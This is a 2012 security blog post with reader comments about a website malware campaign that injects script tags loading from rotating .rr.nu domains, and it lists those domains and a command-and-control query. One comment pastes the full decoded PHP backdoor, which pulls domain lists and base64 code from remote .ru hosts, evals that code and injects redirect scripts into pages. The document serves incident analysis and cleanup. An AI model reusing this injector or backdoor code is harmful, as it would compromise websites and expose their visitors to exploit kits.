• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Malware Campaign from .rr.nu

February 27, 2012David Dede

FacebookTwitterSubscribe

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.

This is what gets added to the footer of the hacked sites:

<script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script>

Once loaded, it does another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but using the parameters h1&s=pmg), which will then attempt to exploit via browser using multiple exploit kits.


Those domains are changing daily, but always pointing to 194.28.114.103. What’s interesting is that the compromised sites also have a backdoor that calls http://www.lilypophilypop.com/g_load.php (their command and control) to get the new list of domains to display.

A quick query of this site shows the current live domains:

$ curl -sq http://www.lilypophilypop.com/g_load.php
http://uotes98satur.rr.nu/
http://ixeld52erlya.rr.nu/
http://ile68depa.rr.nu/
http://cie69svoi.rr.nu/
http://ues02the.rr.nu/
http://ordonv12ectorct.rr.nu/
http://ngv83ete.rr.nu/
http://waranc72hexcit.rr.nu/
http://ereaso88nsphas.rr.nu/
http://erbac03klogwi.rr.nu/
http://rtfall80shesdo.rr.nu/
http://mitexp80ressman.rr.nu/
http://tingst30iffles.rr.nu/
http://ford53blue.rr.nu/
http://trill18ionsa.rr.nu/

Here are domains we have found so far:

aising32austral.rr.nu
anc57erid.rr.nu
ancisc11oretai.rr.nu
arcot97icscch.rr.nu
asu31ryc.rr.nu
atio79srem.rr.nu
ban85kmak.rr.nu
bea90utym.rr.nu
cdeter66minatio.rr.nu
chelpo94landsa.rr.nu
chread73erspar.rr.nu
cie69svoi.rr.nu
dend21ange.rr.nu
deunce68rtaint.rr.nu
dsadva20ntages.rr.nu
eacti41vities.rr.nu
ectors56rushedb.rr.nu
edu11tch.rr.nu
enc89efo.rr.nu
ent70als.rr.nu
ents14publ.rr.nu
erbac03klogwi.rr.nu
ereaso88nsphas.rr.nu
ers49sup.rr.nu
esed94ownu.rr.nu
evaryc13ornerf.rr.nu
ffs06dive.rr.nu
ford53blue.rr.nu
ged20sha.rr.nu
gerd84eckpa.rr.nu
ghl07evel.rr.nu
ibl42efar.rr.nu
ile68depa.rr.nu
ime27glim.rr.nu
ingin64terac.rr.nu
insist18suspen.rr.nu
irdcap79turedre.rr.nu
irstde24clined.rr.nu
iss79ione.rr.nu
itioni67nggene.rr.nu
itsd81evic.rr.nu
ive49scor.rr.nu
ixeld52erlya.rr.nu
jitsu17quakec.rr.nu
king35dayv.rr.nu
lanne44rsacqu.rr.nu
lia82tio.rr.nu
llyim30munity.rr.nu
mitexp80ressman.rr.nu
mputer94izeduni.rr.nu
nadap83artic.rr.nu
ncello05rjuice.rr.nu
ncho61ragef.rr.nu
ngbe82ntse.rr.nu
ngv83ete.rr.nu
nhanc79emayb.rr.nu
nic99wel.rr.nu
nlygpa40rentsre.rr.nu
nom21iesa.rr.nu
nwin54simpl.rr.nu
odity02prince.rr.nu
omist96smoto.rr.nu
onmyse88lfadvis.rr.nu
onth92send.rr.nu
ordonv12ectorct.rr.nu
orkic86kedgra.rr.nu
oul44dbe.rr.nu
pital40relat.rr.nu
quic34kprog.rr.nu
rcles12mainde.rr.nu
renw05insim.rr.nu
rie21rcom.rr.nu
rin43gco.rr.nu
roduc37edter.rr.nu
rpo66rat.rr.nu
rtfall80shesdo.rr.nu
rwest23pasto.rr.nu
sba15gsed.rr.nu
ssurem70ountai.rr.nu
sup01port.rr.nu
syste98msman.rr.nu
tarian13cheese.rr.nu
tel90yget.rr.nu
terda31ytime.rr.nu
tfo04lio.rr.nu
tin04gobs.rr.nu
tingst30iffles.rr.nu
tomoti62veform.rr.nu
trill18ionsa.rr.nu
ttr92acte.rr.nu
ublic19ations.rr.nu
ues02the.rr.nu
untyh37umane.rr.nu
uotes98satur.rr.nu
vesc01hang.rr.nu
vesr27epla.rr.nu
waranc72hexcit.rr.nu

We will post more details as we monitor and can expand.

Let us know in the comments below if you have any questions.

FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. seemore

    February 27, 2012

    Just found this while testing some css on a wordpress install that has been sitting around for a while. Any idea what the likely attack vector was? thought I was running at least a vaguely tight ship. 

    • Richard Bradshaw

      March 4, 2012

      Same here – has anyone identified what and why?

    • Bryan Farris

      March 4, 2012

       I’m in the same boat, trying to remove some outdated files now and might try Walker’s script.

  2. Dave

    February 27, 2012

    My wordpress blog got compromised by this campaign, seemingly via an outdated version of the wp-spamfree plugin (which I can’t even remember installing but it’s possible I did). I manually removed the plugin and upgraded WP to the latest version and that seems to have done the trick.

  3. JBXM

    February 28, 2012

    I’ve got this, as well as a nice chunk of base64-decode code at the beginning of all my php files. I’ve removed that all and upgraded WordPress. I am still getting the redirect script in my footer though. Strangely, it only works in IE. Chrome doesn’t load it.

  4. JBXM

    February 28, 2012

    Just found the source of mine. It was the Open Web Analytics (OWA) plugin files.

  5. Will Brown

    February 28, 2012

    I found two of my sites with this. This is the first time I’ve been hacked. How do I fix it?

    • Dave

      February 28, 2012

      Couple links that might be of use:

      http://codex.wordpress.org/FAQ_My_site_was_hacked

      https://blog.sucuri.net/2010/02/removing-malware-from-a-wordpress-blog-case-study.html — see section 3, cleaning up WordPress.

      What I’ve done so far is basically what they recommend:
      – Back up database
      – Back up files
      – Change MySQL user password
      – Reinstall WordPress (I did this manually but you may be able to do this via the admin panel)
      – Fix/reinstall theme, plugins, etc

      Quite a pain…

      • Will Brown

        February 28, 2012

        Thanks, Dave.
        I’ll give it a try.

      • Rasmus

        March 7, 2012

        I have actually done this, and two days after my theme files were infected again (I changed the FTP password as well).

        Anyone knows how they are getting in? I don’t want to keep cleaning my site when I don’t know how to close the hole they get in through.

        Seems like we’re all on Dreamhost, so maybe it’s something on their network. This will make it really hard for us to fix ourselfs.

  6. Dave

    February 28, 2012

    JBXM, thanks for the tip about the base64-decode prefix on all the php files. I had the same issue. I did a clean install and now my site passes the Sucuri site checker: http://sitecheck.sucuri.net/

  7. Walker de Alencar

    February 28, 2012

    finishing a php code to clean all infected php files, tested. will take more tests, and will share on github near..

  8. Walker de Alencar

    February 28, 2012

    Result of script rrnuVaccine:

    1st wp site  : free(386) | disinfected(321) | total(707)

    2nd wp site: free(4) | disinfected(582) | total(586)

    who interests: https://github.com/walkeralencar/rrnuVaccine

    • shawn

      March 1, 2012

      The script works great!!! Thanks a lot!

    • Filbert

      March 1, 2012

      It looks like it worked for me too.  Thanks!

      • Drew Matthews

        March 5, 2012

        strange this doesnt work for me. I still have infected files. manually removing them is the only cure

        • Walker de Alencar

          March 8, 2012

          new release: v0.2 beta. Bow based on regex search engine, catch more variations. http://t.co/vYdLHJuQ

    • shawn

      March 5, 2012

       It came back.. and this time it’s not working for me at all.  Any suggestions?  I have many sites and 10s of thousands of files that are infected.

    • Doug

      March 9, 2012

       I installed rrnuVaccine.php on our web site and ran it.  All it did was take my browser to your web site.  Am I missing something?

      Thanks

      Regards,
      Doug

      • busybody

        November 9, 2012

        I was also getting redirected to sucuri. it appeared that i had just rightclicked on rrnuVaccine.php and clicked on Save and uploaded to the site. In fact, we have to copy the actual code and save it in notepad to rrnuVaccine.php file then upload. Hope it helps other noobs like me.

    • FirstRentals

      March 9, 2012

      Script works great !! Awesome job saved my site Thanks

  9. Lainey

    February 28, 2012

    My Joomla websites were hacked. Walker’s script did not do the trick for cleaning up the files.  Any mod’s that would allow this script to work for me? 

    • Lainey

      March 1, 2012

      Anything guys?

      • Walker de Alencar

        March 6, 2012

        hi Alaina, i have detected anothers variety string, and iḿ adjust code to search more strings…

        You can update rrnuVaccine.php on line 125 with ur “infected string”, it appear on begin of files: at same line.

        share with me one infected file by pastebin and i will add string in next version ok?

        • shawn

          March 6, 2012

           I can’t believe I didn’t try this.  It worked for me on my 2nd hacked sites.  Is there a way to make it go down one directory?  for example right now i copy it to my /home/user/website directory but i have many sites so is there a way it can start scanning at /home/user/ ?  I am not too familiar with PHP.

          • Walker de Alencar

            March 8, 2012

            try new release on github… forgot strings… itś regex based now!

          • Sue Strong

            March 10, 2012

            I found the backdoor r.php and rr.php buried deep within my wp-content/uploads directory, multiple instances too. Found it running the file, comes up clean but if you look at the code, you will recognize it. Script works great cleaning site.

    • filbert

      March 1, 2012

      Did it give you any errors or did it just not run?  There is a specific string it is looking for that exists at the top of each of your infected pages, something like “eval(base64_decode…[bunch of characters]”  

      This string is specified near the bottom of Walker’s script.  I’m speculating, but it may be possible that you have a different variety of the malware with a different string signature.  See if you can find an example infected page and compare the strings.  This tool was helpful in identifying infected pages.  http://sitecheck.sucuri.net/scanner/

  10. Sue

    February 29, 2012

    Have you any text to include for the robots.txt on our websites? Is there any type of robotics they are using that we can phase out? I put a robots text on my desktop and it seems to function, even for others.

  11. Ricardo Lafuente

    March 1, 2012

    I also got this, from a domain that is not on your list — ingg93rant dot rr dot nu.

  12. Laurie R Young

    March 1, 2012

    Is there any way of telling what their mode of operation is……how or where they found the vulnerabilty that allowed them to get in to your website and what options are available to secure your site better after an attack?

  13. Seraphim Marcopoulos

    March 2, 2012

    One of my sites was affected.  I noticed some entries in my information_schema MySQL database.

    How do I remove them?  Is information_schema a standard part of all WordPress MySQL installs?  If so, is it modified by specific themes?

    SELECT *
    FROM `information_schema`.`PROCESSLIST`
    WHERE (
    `ID` LIKE ‘%<script%'
    OR `USER` LIKE '%<script%'
    OR `HOST` LIKE '%<script%'
    OR `DB` LIKE '%<script%'
    OR `COMMAND` LIKE '%<script%'
    OR `TIME` LIKE '%<script%'
    OR `STATE` LIKE '%<script%'
    OR `INFO` LIKE '%%’
    OR `USER` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `HOST` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `DB` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `COMMAND` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `TIME` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `STATE` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’
    OR `INFO` LIKE ‘%src=”http://rmore79riveru.rr.nu/nl.php?p=d”>%’)
    LIMIT 0 , 30

    EXPLAIN SELECT *
    FROM `information_schema`.`PROCESSLIST`
    WHERE (
    `ID` LIKE ‘%<script%'
    OR `USER` LIKE '%<script%'
    OR `HOST` LIKE '%<script%'
    OR `DB` LIKE '%<script%'
    OR `COMMAND` LIKE '%<script%'
    OR `TIME` LIKE '%<script%'
    OR `STATE` LIKE '%<script%'
    OR `INFO` LIKE '%%’
    OR `USER` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `HOST` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `DB` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `COMMAND` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `TIME` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `STATE` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’
    OR `INFO` LIKE ‘%src=”http://nia91nskg.rr.nu/nl.php?p=d”>%’)

  14. Seraphim Marcopoulos

    March 2, 2012

    Hi all,
    One of my WP installs was affected by malware from .rr.nu.
    Here is the code (from pastebin):
    http://pastebin.com/wKkNk7n6
    How can I clean information_schema? Do themes affect this DB?

  15. snipe

    March 6, 2012

    Any updates on the vector? Having quite a few people reporting this issue.

  16. snipe

    March 7, 2012

    Seems like everyone I’ve spoken to who has been affected by this is on DreamHost. Not sure yet whether it’s just a coincidence… 

    • shawn

      March 7, 2012

      I’m on dream host too..

      • Walker de Alencar

        March 8, 2012

         i’m on dreamhost too.

    • Bryan Farris

      March 7, 2012

      I’m also on DreamHost.  I contacted them about it and they sent me a list of all of the files that they showed as being infected.  Only the WordPress databases were affected for me.  I have a few other directories and those files were unaffected.

      • shawn

        March 7, 2012

        All of my .PHP files were (are infected). It seems to come back every day now. I’m assuming my databases are infected too, how did you clean the DBs? The dream host guy gave me a SSH shell command to run which will apparently remove the bad code, I’ll see if that works but the cause will obviously still be there.

  17. Clay Whiteside

    March 7, 2012

    Walker de Alencar, you are a badass!

    So I am a security idiot… for others like me that get screwed by this – here is the explanation /  answer I have figured so far.

    1. Your site gets a malware notice, especially in IE, I am on a mac and did not get it. 

    2. When you view source your page, just before the closing body tag you see a script directing to an rr.nu domain. Such as

    But when you look at the actual code on the server page (not your local files obviously) you do not see it, but wait… there is now a ton of junk code at the top in a PHP line.

    3. This code is a base64 string and will resemble:

    4. When this is decoded, it really reads as: 

    if(function_exists(‘ob_start’)&&!isset($_SERVER[‘mr_no’])){  $_SERVER[‘mr_no’]=1;    if(!function_exists(‘mrobh’)){    function get_tds_777($url){$content=””;$content=@trycurl_777($url);if($content!==false)return $content;$content=@tryfile_777($url);if($content!==false)return $content;$content=@tryfopen_777($url);if($content!==false)return $content;$content=@tryfsockopen_777($url);if($content!==false)return $content;$content=@trysocket_777($url);if($content!==false)return $content;return ”;}  function trycurl_777($url){if(function_exists(‘curl_init’)===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result==””)return false;return $result;}  function tryfile_777($url){if(function_exists(‘file’)===false)return false;$inc=@file($url);$buf=@implode(”,$inc);if ($buf==””)return false;return $buf;}  function tryfopen_777($url){if(function_exists(‘fopen’)===false)return false;$buf=”;$f=@fopen($url,’r’);if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf==””)return false;return $buf;}  function tryfsockopen_777($url){if(function_exists(‘fsockopen’)===false)return false;$p=@parse_url($url);$host=$p[‘host’];$uri=$p[‘path’].’?’.$p[‘query’];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request =”GET $uri HTTP/1.0n”;$request.=”Host: $hostnn”;fwrite($f,$request);$buf=”;while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf==””)return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function trysocket_777($url){if(function_exists(‘socket_create’)===false)return false;$p=@parse_url($url);$host=$p[‘host’];$uri=$p[‘path’].’?’.$p[‘query’];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request =”GET $uri HTTP/1.0n”;$request.=”Host: $hostnn”;socket_write($sock,$request);$buf=”;while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf==””)return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;}  function update_tds_file_777($tdsfile){$actual1=$_SERVER[‘s_a1’];$actual2=$_SERVER[‘s_a2’];$val=get_tds_777($actual1);if ($val==””)$val=get_tds_777($actual2);$f=@fopen($tdsfile,”w”);if ($f){@fwrite($f,$val);@fclose($f);}if (strstr($val,”|||CODE|||”)){list($val,$code)=explode(“|||CODE|||”,$val);eval(base64_decode($code));}return $val;}  function get_actual_tds_777(){$defaultdomain=$_SERVER[‘s_d1’];$dir=$_SERVER[‘s_p1’];$tdsfile=$dir.”log1.txt”;if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);$ctime=time()-$mtime;if ($ctime>$_SERVER[‘s_t1’]){$content=update_tds_file_777($tdsfile);}else{$content=@file_get_contents($tdsfile);}}else{$content=update_tds_file_777($tdsfile);}$tds=@explode(“n”,$content);$c=@count($tds)+0;$url=$defaultdomain;if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}return $url;}  function is_mac_777($ua){$mac=0;if (stristr($ua,”mac”)||stristr($ua,”safari”))if ((!stristr($ua,”windows”))&&(!stristr($ua,”iphone”)))$mac=1;return $mac;}  function is_msie_777($ua){$msie=0;if (stristr($ua,”MSIE 6″)||stristr($ua,”MSIE 7″)||stristr($ua,”MSIE 8″)||stristr($ua,”MSIE 9″))$msie=1;return $msie;}    function setup_globals_777(){$rz=$_SERVER[“DOCUMENT_ROOT”].”/.logs/”;$mz=”/tmp/”;if (!is_dir($rz)){@mkdir($rz);if (is_dir($rz)){$mz=$rz;}else{$rz=$_SERVER[“SCRIPT_FILENAME”].”/.logs/”;if (!is_dir($rz)){@mkdir($rz);if (is_dir($rz)){$mz=$rz;}}else{$mz=$rz;}}}else{$mz=$rz;}$bot=0;$ua=$_SERVER[‘HTTP_USER_AGENT’];if (stristr($ua,”msnbot”)||stristr($ua,”Yahoo”))$bot=1;if (stristr($ua,”bingbot”)||stristr($ua,”google”))$bot=1;$msie=0;if (is_msie_777($ua))$msie=1;$mac=0;if (is_mac_777($ua))$mac=1;if (($msie==0)&&($mac==0))$bot=1;  global $_SERVER;    $_SERVER[‘s_p1’]=$mz;  $_SERVER[‘s_b1’]=$bot;  $_SERVER[‘s_t1’]=1200;  $_SERVER[‘s_d1′]=”http://sweepstakesandcontestsdo.com/”;  $d=’?d=’.urlencode($_SERVER[“HTTP_HOST”]).”&p=”.urlencode($_SERVER[“PHP_SELF”]).”&a=”.urlencode($_SERVER[“HTTP_USER_AGENT”]);  $_SERVER[‘s_a1′]=’http://www.mrsmtihinfo.ru/g_load.php’.$d;  $_SERVER[‘s_a2′]=’http://www.cooperjsutf8.ru/g_load.php’.$d;  $_SERVER[‘s_script’]=”nl.php?p=d”;  }      setup_globals_777();    if(!function_exists(‘gml_777’)){  function gml_777(){    $r_string_777=”;  if ($_SERVER[‘s_b1’]==0)$r_string_777=”;  return $r_string_777;  }  }      if(!function_exists(‘gzdecodeit’)){  function gzdecodeit($decode){  $t=@ord(@substr($decode,3,1));  $start=10;  $v=0;  if($t&4){  $str=@unpack(‘v’,substr($decode,10,2));  $str=$str[1];  $start+=2+$str;  }  if($t&8){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&16){  $start=@strpos($decode,chr(0),$start)+1;  }  if($t&2){  $start+=2;  }  $ret=@gzinflate(@substr($decode,$start));  if($ret===FALSE){  $ret=$decode;  }  return $ret;  }  }  function mrobh($content){  @Header(‘Content-Encoding: none’);  $decoded_content=gzdecodeit($content);  if(preg_match(‘/</body/si',$decoded_content)){  return preg_replace('/(]*>)/si’,gml_777().”n”.’$1′,$decoded_content);  }else{  return $decoded_content.gml_777();  }  }  ob_start(‘mrobh’);  }  }

    5. I have not done much investigating into these sites, but the script redirects to random urls all pointing to an IP address 194.28.114.103 in F’ing Maldova (I had to look it up, a country between Ukraine and Romania) So when this code that is inserted into all php and html pages is inserted and decoded, it appears http://sweepstakesandcontestsdo.com , http://www.mrsmtihinfo.ru , http://www.cooperjsutf8.ru are the culprits. I hope someone can do something about these jack asses. 

    6. I am running a current and totally updated version of WordPress when it was hacked.
    a) deactivate all plugins, and update them
    b) update wordpress network
    c) update theme if valid
    d) in general, strip everything down as much as possible and update what you can
    e) check your .htacess file, go get it from your remote server and remove the junk and check your permissions are 644, you can do this through Cpanel.
    f) change your ftp user password, AND be sure to change your connection method on whatever FTP client you use to “SFPT”
    g) check your wordpress admin users to make sure you are aware of all admin account, change passwords

    7) go to https://github.com/walkeralencar/rrnuVaccine and copy the php code from Walker’s script into a new PHP file, 

    NOTE: before uploading, and this is the key to make it work for you as the base64 junk in your page will be likely be slightly different from various mutations of this malware bull… “Get” a copy of an infected page and copy all the code from:

    and replace your garbage code over Walker’s script code (begin on line 125)

    8. Save and upload it on the root of your site (where the wp-config file is) and run it through the browser. I had over 2,000 files disinfected. Go to http://sitecheck.sucuri.net/scanner/ and scan your URL (if you have done this prior, you will see cached results, even if you hit the browser refresh button) be sure to hit the “rescan” button at the bottom of the site. I am all clear now!

    9. Not yet where the actual vulnerability is and I expect this to come back, but at least I can clean it now in moments, thanks to Walker, as I keep figuring it out. On to further investigate and search “Harden WordPress”… I’ll update with more as I learn. 

    • Clay Whiteside

      March 7, 2012

      ok so code snippets were stripped out in my reply, if you need them, just holler for details.

      • Walker de Alencar

        March 8, 2012

         i was working have 3 days, but have only 2h/day to work with this.

    • Walker de Alencar

      March 8, 2012

      now it’s easy, check new v0.2 beta, regex based, forget strings…

  18. Errol

    March 7, 2012

    we have been infected by malware from http://ustreamtvonline.rr.nu/

  19. mdunlap1

    March 8, 2012

    I’m trying to use Walker’s script, but it returns this when I try to run it:

    Warning: Unexpected character in input: ” (ASCII=92) state=1 in /blog/rrnuVaccine.php on line 8

    Warning: Unexpected character in input: ” (ASCII=92) state=1 in /blog/rrnuVaccine.php on line 14

    Parse error: syntax error, unexpected T_CLASS in /blog/rrnuVaccine.php on line 15

    Any ideas on how to make it work?

    • Walker de Alencar

      March 8, 2012

      wtf php version are using?

      required php 5.1+

  20. Walker de Alencar

    March 8, 2012

    rrnu Vaccine v0.2 beta on github: http://t.co/vYdLHJuQ

    Regex based, now detect more variants.

  21. Errol

    March 8, 2012

    Here is another: http://ustreamtvonline.rr.nu

  22. Elisa

    March 8, 2012

    Hi, today I’ve found inside my wp site (hosted on site5, London server) a directory called “.logs” and there a txt files with a list of rr.nu subdomains. What does it mean?

    • Rasmus

      March 8, 2012

      It means that you’re f… just like the rest of us :(.

      I’ve blogged about this and how you get out trouble again:
      http://my4hours.com/hackers-got-my-ass-and-how-you-can-prevent-it-from-happening-to-you

      • Elisa

        March 8, 2012

        But if I run https://github.com/walkeralencar/rrnuVaccine and then I delete that directory, am I ok?
        I found the infection started from a wordpress plugin, eshop-languages. Sigh!

        • Rasmus

          March 8, 2012

          Perhaps… The problem is that it can be hard to identify yourself if your not a tech wiz. Even though I have a long background with computers, I still ended up buying one of Sucuri’s packages (and everything was dandy fine an hour later)

          • Walker de Alencar

            March 9, 2012

             now are easy, dont need identify infection string. v0.2 beta are Regex based.

            Only put on root dir, and run script 😉

  23. Cherie Young

    March 11, 2012

    I don’t know what we would have done without Sucuri.  All sites are now stable, I have a few of our staging sites that continue to get infected.  After 2 long years of dealing with this, Sucuri.net has literally saved dozens of our clients’ sites.  YOU GUYS ARE THE BEST.

    Cherie Young

  24. simon

    March 13, 2012

    Hi, I wrote a pretty lengthy and thorough piece on my fix for this hack.  It’s posted here:

    http://domesticenthusiast.blogspot.com/

    simon

    • David

      October 22, 2012

      I have just encountered a pretty stubborn bit of this hacking and was looking. around for things to help. Your article was very informative, thanks.

  25. mikkelbo

    April 29, 2012

    Here’s another URL used by the malware: meant86lakefo.rr.nu

  26. Finch

    July 19, 2012

    How can I remove it. I looked into my footer.php and source code and I can’t find it. But, when I scanned my site using sucuri.net, you were able to detect it, but don’t show where it’s located exactly. 🙁

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.